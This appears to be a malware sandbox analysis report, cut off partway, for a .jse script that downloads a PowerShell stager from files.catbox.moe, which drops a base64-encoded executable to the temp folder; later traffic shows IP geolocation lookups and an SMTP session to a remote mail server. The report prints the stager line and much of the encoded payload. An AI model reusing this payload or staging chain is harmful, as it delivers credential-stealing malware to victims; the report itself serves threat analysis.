                                                                                                      Jan 9, 2025 18:33:19.797038078 CET1.1.1.1192.168.2.40x5eaNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                      Jan 9, 2025 18:33:19.797038078 CET1.1.1.1192.168.2.40x5eaNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                      Jan 9, 2025 18:33:19.797038078 CET1.1.1.1192.168.2.40x5eaNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                      Jan 9, 2025 18:33:19.797038078 CET1.1.1.1192.168.2.40x5eaNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                      Jan 9, 2025 18:33:19.797038078 CET1.1.1.1192.168.2.40x5eaNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                      Jan 9, 2025 18:33:19.797038078 CET1.1.1.1192.168.2.40x5eaNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                      Jan 9, 2025 18:33:27.130851030 CET1.1.1.1192.168.2.40x9848No error (0)mail.phobinh.com.vnmail24430.maychuemail.comCNAME (Canonical name)IN (0x0001)false
                                                                                                      Jan 9, 2025 18:33:27.130851030 CET1.1.1.1192.168.2.40x9848No error (0)mail24430.maychuemail.com123.30.244.30A (IP address)IN (0x0001)false
                                                                                                      • files.catbox.moe
                                                                                                      • reallyfreegeoip.org
                                                                                                      • checkip.dyndns.org
                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.449731132.226.247.73807704C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Jan 9, 2025 18:33:18.871431112 CET151OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
                                                                                                      Jan 9, 2025 18:33:19.559628010 CET273INHTTP/1.1 200 OK
                                                                                                      Date: Thu, 09 Jan 2025 17:33:19 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 104
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                      Jan 9, 2025 18:33:19.563570976 CET127OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Jan 9, 2025 18:33:19.775367975 CET273INHTTP/1.1 200 OK
                                                                                                      Date: Thu, 09 Jan 2025 17:33:19 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 104
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                      Jan 9, 2025 18:33:26.167696953 CET127OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Jan 9, 2025 18:33:26.380079985 CET273INHTTP/1.1 200 OK
                                                                                                      Date: Thu, 09 Jan 2025 17:33:26 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 104
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.449730108.181.20.354437408C:\Windows\System32\wscript.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-09 17:33:11 UTC330OUTGET /jqxrkk.ps1 HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Language: en-ch
                                                                                                      UA-CPU: AMD64
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                      Host: files.catbox.moe
                                                                                                      Connection: Keep-Alive
                                                                                                      2025-01-09 17:33:11 UTC551INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Thu, 09 Jan 2025 17:33:11 GMT
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-Length: 186488
                                                                                                      Last-Modified: Thu, 09 Jan 2025 00:15:44 GMT
                                                                                                      Connection: close
                                                                                                      ETag: "677f1530-2d878"
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Content-Security-Policy: default-src 'self' https://files.catbox.moe; style-src https://files.catbox.moe 'unsafe-inline'; img-src 'self' data:; font-src 'self'; media-src 'self'; object-src 'self';
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      Access-Control-Allow-Methods: GET, HEAD
                                                                                                      Accept-Ranges: bytes
                                                                                                      2025-01-09 17:33:11 UTC15833INData Raw: 24 70 3d 5b 49 4f 2e 50 61 74 68 5d 3a 3a 43 6f 6d 62 69 6e 65 28 24 65 6e 76 3a 54 45 4d 50 2c 22 78 2e 65 78 65 22 29 0d 0a 5b 49 4f 2e 46 69 6c 65 5d 3a 3a 57 72 69 74 65 41 6c 6c 42 79 74 65 73 28 24 70 2c 5b 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75
                                                                                                      Data Ascii: $p=[IO.Path]::Combine($env:TEMP,"x.exe")[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUu
                                                                                                      2025-01-09 17:33:11 UTC16384INData Raw: 45 57 50 61 6e 6c 49 6c 7a 2b 6b 41 61 31 47 34 67 6c 53 76 31 2b 49 39 57 62 50 61 32 56 43 62 55 64 53 5a 55 37 6d 44 47 6c 35 78 34 75 6b 2f 6f 59 2f 77 55 6a 6b 77 4a 4a 38 34 72 47 4d 59 74 37 4f 35 30 67 59 75 42 77 58 62 6b 66 57 6f 34 63 32 32 2f 5a 75 63 74 5a 46 61 78 53 43 4c 70 6c 4a 4e 4e 6e 4b 33 42 49 74 48 39 6a 42 47 62 59 64 6f 50 64 4e 77 38 4f 75 6f 63 61 48 67 32 44 79 54 72 4f 70 72 37 2f 6e 6f 43 4c 55 4c 4a 6c 76 4b 6a 6f 78 63 44 61 6d 68 75 6c 59 2f 4f 31 39 75 59 4e 41 65 68 64 54 49 62 74 63 6f 52 39 34 31 36 56 53 58 67 7a 66 6b 44 50 50 61 4e 4f 76 43 39 49 65 57 6e 2b 4d 38 44 4d 71 6e 37 78 75 69 58 6b 79 39 62 6b 50 64 6f 51 62 69 6b 69 31 2b 77 75 56 45 6f 62 43 44 68 2f 6d 44 66 70 74 6e 41 4e 70 34 46 55 71 75 4c 31 49
                                                                                                      Data Ascii: EWPanlIlz+kAa1G4glSv1+I9WbPa2VCbUdSZU7mDGl5x4uk/oY/wUjkwJJ84rGMYt7O50gYuBwXbkfWo4c22/ZuctZFaxSCLplJNNnK3BItH9jBGbYdoPdNw8OuocaHg2DyTrOpr7/noCLULJlvKjoxcDamhulY/O19uYNAehdTIbtcoR9416VSXgzfkDPPaNOvC9IeWn+M8DMqn7xuiXky9bkPdoQbiki1+wuVEobCDh/mDfptnANp4FUquL1I
                                                                                                      2025-01-09 17:33:11 UTC16384INData Raw: 39 69 63 6c 65 2f 67 2b 63 36 57 6b 68 55 44 65 62 31 6a 48 34 75 75 39 31 4b 37 6f 6a 4f 6d 49 30 48 67 59 49 69 56 4e 64 6c 32 56 33 54 76 38 71 4f 30 46 71 41 66 34 6b 38 35 57 52 72 4d 71 75 72 31 4f 48 4e 4f 53 66 42 62 5a 65 36 48 57 45 55 47 5a 73 31 33 75 4e 67 6a 34 47 58 79 75 67 6b 2b 4a 4b 64 35 53 62 62 56 72 32 34 76 54 6c 41 45 32 71 48 48 75 47 78 66 6d 56 72 4c 42 53 6f 31 44 6d 6e 2f 4e 43 2b 4e 66 79 30 4f 39 77 4d 30 45 59 35 53 4a 4a 6e 32 44 69 58 69 37 30 65 46 4b 64 52 2b 7a 4d 36 47 54 51 72 76 5a 62 78 34 6c 61 54 6f 68 31 33 6e 4d 4f 55 31 6a 46 71 78 4c 5a 57 30 50 6d 35 36 4c 4f 67 35 53 67 53 4a 79 31 42 5a 30 34 42 69 4b 32 67 2b 32 64 47 43 69 79 61 37 70 49 51 53 73 2f 6d 79 50 4d 64 35 5a 73 4d 5a 66 36 77 55 33 64 38 32
                                                                                                      Data Ascii: 9icle/g+c6WkhUDeb1jH4uu91K7ojOmI0HgYIiVNdl2V3Tv8qO0FqAf4k85WRrMqur1OHNOSfBbZe6HWEUGZs13uNgj4GXyugk+JKd5SbbVr24vTlAE2qHHuGxfmVrLBSo1Dmn/NC+Nfy0O9wM0EY5SJJn2DiXi70eFKdR+zM6GTQrvZbx4laToh13nMOU1jFqxLZW0Pm56LOg5SgSJy1BZ04BiK2g+2dGCiya7pIQSs/myPMd5ZsMZf6wU3d82
                                                                                                      2025-01-09 17:33:11 UTC16384INData Raw: 31 6e 6e 2b 64 51 32 4e 55 71 67 4c 47 68 50 62 43 4d 2f 55 6e 44 36 31 62 45 61 36 36 48 76 65 2b 4a 5a 47 79 31 6d 69 36 39 34 71 50 6d 63 69 46 5a 57 75 30 4d 44 31 62 4d 51 73 78 52 72 6a 6c 2b 6e 6f 61 64 48 78 6f 57 4f 54 6c 73 61 77 63 41 74 4e 38 46 75 6f 71 72 68 68 63 77 77 30 74 36 51 31 44 32 48 6d 4f 74 64 59 51 2b 31 48 6e 4f 64 49 50 64 32 45 71 49 67 36 4b 4d 36 79 4f 48 6e 77 4a 47 66 7a 44 6b 76 66 47 58 68 57 73 46 70 41 2f 68 44 58 2f 6f 61 47 7a 78 6c 32 5a 6c 59 75 4b 2b 53 52 65 38 65 37 59 66 51 6f 59 75 78 75 6c 4f 7a 2f 34 49 59 45 35 36 48 6c 46 70 5a 63 35 61 4d 65 6e 71 51 34 59 66 75 44 62 4a 45 4b 35 61 64 41 62 43 35 52 5a 4d 32 76 65 34 30 2b 31 74 5a 6e 4a 6a 2b 37 4d 56 51 79 78 4d 66 4f 44 4c 55 64 38 37 4e 44 32 35 76
                                                                                                      Data Ascii: 1nn+dQ2NUqgLGhPbCM/UnD61bEa66Hve+JZGy1mi694qPmciFZWu0MD1bMQsxRrjl+noadHxoWOTlsawcAtN8Fuoqrhhcww0t6Q1D2HmOtdYQ+1HnOdIPd2EqIg6KM6yOHnwJGfzDkvfGXhWsFpA/hDX/oaGzxl2ZlYuK+SRe8e7YfQoYuxulOz/4IYE56HlFpZc5aMenqQ4YfuDbJEK5adAbC5RZM2ve40+1tZnJj+7MVQyxMfODLUd87ND25v
                                                                                                      2025-01-09 17:33:11 UTC16384INData Raw: 35 48 48 33 75 69 66 2f 56 51 6d 74 52 61 39 73 44 4a 53 69 79 38 63 78 38 6d 62 37 47 38 66 7a 6d 68 67 42 46 2b 34 55 74 68 46 73 48 43 76 62 71 71 41 37 57 59 35 67 54 2b 73 67 72 44 65 59 35 4a 69 44 31 7a 31 64 31 33 6d 55 79 50 2b 6d 66 38 4c 34 66 49 6a 75 55 71 61 43 6d 70 76 69 78 51 74 45 2b 7a 59 6e 6c 46 30 52 58 62 33 47 49 54 32 4f 48 56 65 45 6e 33 48 35 35 54 54 56 6e 66 6c 49 33 6f 32 41 4c 68 41 74 6e 2f 59 56 51 4e 4d 66 76 56 76 42 6b 6d 70 6d 36 62 2b 64 6b 6b 47 57 78 45 6a 31 45 6d 59 39 44 4e 38 78 62 35 42 32 33 47 5a 43 44 39 7a 4c 7a 68 52 48 75 47 66 32 50 46 43 56 73 30 35 66 43 6a 74 66 68 4c 78 34 75 4b 4e 4f 52 41 62 56 34 6a 6f 4b 38 77 4a 51 6f 76 75 66 52 46 4d 58 38 32 6e 5a 32 33 72 77 37 31 48 64 77 6b 6b 68 42 75 31
                                                                                                      Data Ascii: 5HH3uif/VQmtRa9sDJSiy8cx8mb7G8fzmhgBF+4UthFsHCvbqqA7WY5gT+sgrDeY5JiD1z1d13mUyP+mf8L4fIjuUqaCmpvixQtE+zYnlF0RXb3GIT2OHVeEn3H55TTVnflI3o2ALhAtn/YVQNMfvVvBkmpm6b+dkkGWxEj1EmY9DN8xb5B23GZCD9zLzhRHuGf2PFCVs05fCjtfhLx4uKNORAbV4joK8wJQovufRFMX82nZ23rw71HdwkkhBu1
                                                                                                      2025-01-09 17:33:11 UTC16384INData Raw: 36 62 56 76 6d 45 36 62 6a 39 59 32 6f 67 57 6e 49 56 74 4a 53 7a 6c 4d 2f 33 61 53 52 6a 62 6f 32 68 53 61 31 35 2b 71 2b 32 49 43 42 47 4d 42 70 64 75 67 4a 65 4d 36 6c 41 6f 67 33 31 67 2f 31 61 59 5a 48 62 33 5a 32 34 50 67 76 50 6c 78 6b 71 38 59 56 55 38 62 34 58 68 32 76 37 47 34 39 78 66 66 52 76 4e 48 50 42 35 66 76 75 47 58 4e 4e 62 35 55 73 52 6a 58 64 2b 57 47 44 61 44 76 69 72 62 6c 33 35 77 50 59 34 77 75 62 36 46 68 35 4a 54 6d 71 31 68 64 47 45 43 4b 68 76 32 43 36 66 32 6f 42 63 50 58 4e 66 30 73 63 67 54 2b 38 4c 69 32 53 61 38 38 47 49 6b 77 44 34 30 48 68 34 35 55 46 4b 43 46 55 30 48 77 6e 77 38 36 51 51 71 70 79 7a 56 65 5a 35 6a 54 69 50 76 51 4a 53 64 4c 74 39 62 52 46 66 48 58 5a 69 53 6c 6f 38 6a 36 74 47 39 2b 38 6c 42 76 67 76
                                                                                                      Data Ascii: 6bVvmE6bj9Y2ogWnIVtJSzlM/3aSRjbo2hSa15+q+2ICBGMBpdugJeM6lAog31g/1aYZHb3Z24PgvPlxkq8YVU8b4Xh2v7G49xffRvNHPB5fvuGXNNb5UsRjXd+WGDaDvirbl35wPY4wub6Fh5JTmq1hdGECKhv2C6f2oBcPXNf0scgT+8Li2Sa88GIkwD40Hh45UFKCFU0Hwnw86QQqpyzVeZ5jTiPvQJSdLt9bRFfHXZiSlo8j6tG9+8lBvgv
                                                                                                      2025-01-09 17:33:11 UTC16384INData Raw: 5a 54 34 52 2b 63 31 6b 65 66 4a 7a 47 52 75 38 59 38 7a 61 4d 50 5a 50 42 34 6a 77 48 78 50 31 74 46 7a 59 6f 2b 47 34 75 53 65 7a 65 45 4d 55 65 41 52 64 31 6f 78 67 6a 66 36 4d 54 57 47 32 45 6c 46 59 52 65 32 67 44 63 33 72 6f 79 59 37 49 70 52 71 55 44 72 74 72 58 52 46 31 68 64 48 45 57 56 35 4b 6a 43 4d 57 78 73 62 43 51 4d 30 48 68 6a 4c 4e 54 6a 53 33 35 41 6f 65 44 68 38 42 6e 33 33 48 50 72 59 7a 70 35 62 4e 39 67 44 41 6d 72 77 55 78 4f 6f 72 57 65 58 77 35 6e 4b 79 44 73 65 5a 31 52 33 2f 74 45 54 6b 4d 4d 44 47 34 41 42 7a 55 6e 32 43 46 71 72 59 33 45 49 73 52 57 71 38 43 31 67 77 6e 50 43 32 31 2f 54 4f 44 79 77 51 47 49 6c 67 6a 50 38 61 45 62 37 63 79 50 77 44 75 70 66 53 33 6b 6d 70 39 36 50 76 77 4e 71 47 61 4b 2b 52 77 74 77 71 4b 66
                                                                                                      Data Ascii: ZT4R+c1kefJzGRu8Y8zaMPZPB4jwHxP1tFzYo+G4uSezeEMUeARd1oxgjf6MTWG2ElFYRe2gDc3royY7IpRqUDrtrXRF1hdHEWV5KjCMWxsbCQM0HhjLNTjS35AoeDh8Bn33HPrYzp5bN9gDAmrwUxOorWeXw5nKyDseZ1R3/tETkMMDG4ABzUn2CFqrY3EIsRWq8C1gwnPC21/TODywQGIlgjP8aEb7cyPwDupfS3kmp96PvwNqGaK+RwtwqKf
                                                                                                      2025-01-09 17:33:11 UTC16384INData Raw: 41 53 2f 65 79 64 77 2f 53 6e 71 71 66 66 54 39 4e 51 33 52 78 44 6c 76 39 6e 51 72 5a 41 30 6d 77 6f 7a 73 74 75 7a 41 31 65 65 65 52 6a 75 70 68 31 59 72 6f 63 50 30 61 34 75 45 53 45 46 4c 55 34 77 45 48 53 64 5a 7a 44 33 63 51 32 6e 4b 37 69 6a 72 42 33 2f 68 65 62 74 41 2f 63 6a 2b 37 44 59 54 6f 4a 67 56 4a 71 35 62 55 6e 47 51 41 49 5a 66 37 69 6d 47 4f 54 4f 49 4a 62 53 75 30 56 72 36 4f 63 6e 48 59 68 32 55 7a 74 6a 37 30 30 76 69 6a 7a 51 47 4c 48 52 32 42 4a 48 75 76 44 56 42 67 73 4d 41 65 74 37 74 65 30 44 4b 50 78 34 75 42 2f 63 79 75 35 51 66 70 62 46 2b 48 75 4e 74 46 63 55 56 79 61 32 5a 65 4f 6b 36 33 78 51 6d 74 6f 50 7a 71 48 6b 48 54 36 72 42 64 53 51 44 4f 76 72 6b 47 77 69 54 6e 59 46 41 6d 4d 55 32 2f 4e 37 59 4d 58 61 37 33 4a 37
                                                                                                      Data Ascii: AS/eydw/SnqqffT9NQ3RxDlv9nQrZA0mwozstuzA1eeeRjuph1YrocP0a4uESEFLU4wEHSdZzD3cQ2nK7ijrB3/hebtA/cj+7DYToJgVJq5bUnGQAIZf7imGOTOIJbSu0Vr6OcnHYh2Uztj700vijzQGLHR2BJHuvDVBgsMAet7te0DKPx4uB/cyu5QfpbF+HuNtFcUVya2ZeOk63xQmtoPzqHkHT6rBdSQDOvrkGwiTnYFAmMU2/N7YMXa73J7
                                                                                                      2025-01-09 17:33:11 UTC16384INData Raw: 36 6f 59 65 34 4e 5a 4f 74 68 2f 51 4c 6d 2b 42 7a 37 2f 4e 63 6b 54 41 46 47 6a 44 34 77 50 7a 41 6c 4a 61 33 6b 6c 77 46 6c 4f 4b 6c 43 48 77 52 74 4d 77 6d 38 52 63 59 48 63 62 78 6f 58 47 65 44 77 74 48 39 38 36 7a 4a 7a 2b 66 59 6d 73 4e 75 39 7a 2b 78 2b 46 6b 73 4a 6f 62 53 6b 68 59 72 6f 37 59 62 49 37 67 52 46 31 61 2b 71 2f 6c 6d 36 33 70 4a 5a 38 4c 6f 31 59 43 38 6f 6c 76 52 31 31 6f 33 33 38 35 61 52 4d 75 6b 62 6f 72 4d 4a 70 71 41 67 50 30 35 46 68 78 73 4c 66 73 2f 6c 74 69 36 6c 72 4a 39 79 43 41 56 65 7a 33 62 6f 74 41 76 55 6c 54 79 47 57 56 6e 73 54 5a 38 65 65 6b 55 2f 4c 6d 34 59 6f 55 4f 42 75 36 6f 66 65 70 79 37 76 32 35 55 41 65 41 6e 6e 58 51 58 36 79 70 6d 38 50 58 6d 61 4b 59 67 79 35 45 4a 30 4d 77 61 46 45 63 2b 35 74 74 75
                                                                                                      Data Ascii: 6oYe4NZOth/QLm+Bz7/NckTAFGjD4wPzAlJa3klwFlOKlCHwRtMwm8RcYHcbxoXGeDwtH986zJz+fYmsNu9z+x+FksJobSkhYro7YbI7gRF1a+q/lm63pJZ8Lo1YC8olvR11o3385aRMukborMJpqAgP05FhxsLfs/lti6lrJ9yCAVez3botAvUlTyGWVnsTZ8eekU/Lm4YoUOBu6ofepy7v25UAeAnnXQX6ypm8PXmaKYgy5EJ0MwaFEc+5ttu
                                                                                                      2025-01-09 17:33:11 UTC16384INData Raw: 41 41 41 51 42 34 42 77 41 41 41 67 44 35 42 41 41 41 41 51 42 52 42 51 41 41 41 51 42 34 42 67 41 41 41 67 41 51 41 51 41 41 41 51 41 78 41 51 41 41 41 67 43 35 42 67 41 41 41 51 43 31 41 41 41 41 41 51 41 78 41 51 41 41 41 51 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 67 41 41 41 41 41 41 41 77 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 67 41 41 41 41 41 41 41 77 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 67 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 67 41 41 41 41 41 41 41 77 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 67 41 41 41 41 41 41 41 77 41 41 41 41 41 41 42 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 67 41 41 41 41 41 41 41 77 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 67 41 41 41 41 41 41 41 77 41 41 41
                                                                                                      Data Ascii: AAAQB4BwAAAgD5BAAAAQBRBQAAAQB4BgAAAgAQAQAAAQAxAQAAAgC5BgAAAQC1AAAAAQAxAQAAAQAAAAAAAQAAAAAAAgAAAAAAAwAAAAAAAQAAAAAAAgAAAAAAAwAAAAAAAQAAAAAAAgAAAAAAAQAAAAAAAQAAAAAAAgAAAAAAAwAAAAAAAQAAAAAAAgAAAAAAAwAAAAAABAAAAAAAAQAAAAAAAgAAAAAAAwAAAAAAAQAAAAAAAgAAAAAAAwAAA


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.449732104.21.96.14437704C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-09 17:33:20 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      Connection: Keep-Alive
                                                                                                      2025-01-09 17:33:20 UTC859INHTTP/1.1 200 OK
                                                                                                      Date: Thu, 09 Jan 2025 17:33:20 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 362
                                                                                                      Connection: close
                                                                                                      Age: 1758789
                                                                                                      Cache-Control: max-age=31536000
                                                                                                      cf-cache-status: HIT
                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tVmTfNWZDrKwgeUbWR8T13Yv%2Bm4Fz5n%2BMTWAjT9dQQCwHa9ir6x07JwINa3TfCNKOGPOJLK3T%2BH9rRlUdHp07wd0yiZaBogVAfI2uK4PSVQd91iZ4kgZCovp7SXA%2BO8VKqhm3OgA"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8ff62bfc28d8c32e-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=11500&min_rtt=1998&rtt_var=6567&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1461461&cwnd=178&unsent_bytes=0&cid=4797d18aaa7e3ab8&ts=400&x=0"
                                                                                                      2025-01-09 17:33:20 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                      Jan 9, 2025 18:33:28.874438047 CET58749736123.30.244.30192.168.2.4220-500254.static.maychudns.com ESMTP MSA Fri, 10 Jan 2025 00:33:28 +0700
                                                                                                      220 ESMTP This server does not relay
                                                                                                      Jan 9, 2025 18:33:28.874634981 CET49736587192.168.2.4123.30.244.30EHLO 088753
                                                                                                      Jan 9, 2025 18:33:29.441633940 CET58749736123.30.244.30192.168.2.4250-500254.static.maychudns.com Hello 088753 [8.46.123.189], pleased to meet you
                                                                                                      250-AUTH LOGIN CRAM-MD5 PLAIN
                                                                                                      250-8BITMIME
                                                                                                      250-ENHANCEDSTATUSCODES
                                                                                                      250-STARTTLS
                                                                                                      250 SIZE 35840000
                                                                                                      Jan 9, 2025 18:33:29.441786051 CET49736587192.168.2.4123.30.244.30STARTTLS
                                                                                                      Jan 9, 2025 18:33:29.789529085 CET58749736123.30.244.30192.168.2.4220 2.7.0 Ready to start TLS

                                                                                                      Click to jump to process

                                                                                                      Click to jump to process

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Click to jump to process

                                                                                                      Target ID:0
                                                                                                      Start time:12:33:08
                                                                                                      Start date:09/01/2025
                                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1C24TDP_000000029.jse"
                                                                                                      Imagebase:0x7ff692330000
                                                                                                      File size:170'496 bytes
                                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:1
                                                                                                      Start time:12:33:11
                                                                                                      Start date:09/01/2025
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
                                                                                                      Imagebase:0x7ff788560000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:2
                                                                                                      Start time:12:33:11
